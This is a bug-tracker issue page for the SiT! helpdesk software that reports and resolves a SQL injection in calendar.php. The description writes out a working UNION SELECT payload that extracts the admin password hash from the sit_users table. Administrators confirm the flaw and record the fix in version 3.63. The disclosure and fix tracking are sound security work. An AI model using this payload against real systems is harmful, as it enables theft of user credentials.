| Anonymous | Login | Signup for a new account | 2020-06-01 00:09 BST |  |
| Main | My View | View Issues | Change Log | Roadmap |
| View Issue Details [ Jump to Notes ] | [ Issue History ] [ Print ] | ||||||||
| ID | Project | Category | View Status | Date Submitted | Last Update | ||||
| 0001395 | SiT! | calendar | public | 2010-09-08 15:28 | 2011-04-16 15:07 | ||||
| Reporter | Tomse | ||||||||
| Assigned To | paulh | ||||||||
| Priority | normal | Severity | major | Reproducibility | unable to reproduce | ||||
| Status | closed | Resolution | fixed | ||||||
| Platform | OS | OS Version | |||||||
| Product Version | 3.62 LTS | ||||||||
| Target Version | 3.63 LTS | Fixed in Version | 3.63 LTS | ||||||
| Summary | 0001395: possible SQL injection | ||||||||
| Description | /calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;-- I was given this line, it should extract the admin hash, I haven't been able to repro it.. | ||||||||
| Steps To Reproduce | Login to sit as any user, paste the above URL modified to your system (don't forget the sit_users table) this will list the user admin with the hashed password value in the users field. I've been able to reproduce this, both in the 3.62 and SVN | ||||||||
| Tags | security | ||||||||
| Attached Files | |||||||||
 Relationships |
|
 Relationships |
|
Notes |
|
 (0003408)kieran (administrator) 2010-09-11 13:44 |
Confirmed here. |
 (0003426)ivan (administrator) 2010-10-09 11:24 |
I can confirm this too |
 (0003427)paulh (administrator) 2010-10-09 11:27 |
yeap I've managed to repro and have a fix almost ready |
|
(0003428) paulh (administrator) 2010-10-09 11:32 |
r6693 and 58e5772 resolve this This exploit is only available to authenticated users |
|
(0003708) ivan (administrator) 2011-04-16 13:21 |
http://www.autosectools.com/Advisories/Support.Incident.Tracker.3.62_Reflected.Cross-site.Scripting_132.html [^] |
|
(0003709) ivan (administrator) 2011-04-16 13:23 |
Magpierss issue fixed in r7110 and Git 5d06e50 |
|
(0003714) ivan (administrator) 2011-04-16 15:07 |
Fix Released in 3.63 |
|
Notes |
|
Issue History |
|||
| Date Modified | Username | Field | Change |
| 2010-09-08 15:28 | Tomse | New Issue | |
| 2010-09-11 12:33 | Tomse | Description Updated | View Revisions |
| 2010-09-11 12:33 | Tomse | Steps to Reproduce Updated | View Revisions |
| 2010-09-11 12:35 | Tomse | Description Updated | View Revisions |
| 2010-09-11 13:44 | kieran | Note Added: 0003408 | |
| 2010-09-11 13:44 | kieran | Assigned To | => kieran |
| 2010-09-11 13:44 | kieran | Status | new => confirmed |
| 2010-10-09 11:16 | paulh | Status | confirmed => assigned |
| 2010-10-09 11:16 | paulh | Assigned To | kieran => paulh |
| 2010-10-09 11:24 | ivan | Note Added: 0003426 | |
| 2010-10-09 11:27 | paulh | Note Added: 0003427 | |
| 2010-10-09 11:32 | paulh | Note Added: 0003428 | |
| 2010-10-09 11:32 | paulh | Status | assigned => resolved |
| 2010-10-09 11:32 | paulh | Resolution | open => fixed |
| 2010-10-09 11:32 | paulh | Fixed in Version | => 3.63 LTS |
| 2010-10-09 11:32 | paulh | Target Version | => 3.63 LTS |
| 2010-10-09 11:32 | paulh | Tag Attached: security | |
| 2011-04-16 13:21 | ivan | Note Added: 0003708 | |
| 2011-04-16 13:23 | ivan | Note Added: 0003709 | |
| 2011-04-16 13:23 | ivan | View Status | private => public |
| 2011-04-16 15:07 | ivan | Note Added: 0003714 | |
| 2011-04-16 15:07 | ivan | Status | resolved => closed |
|
Issue History |
| Copyright © 2000 - 2020 MantisBT Team |
|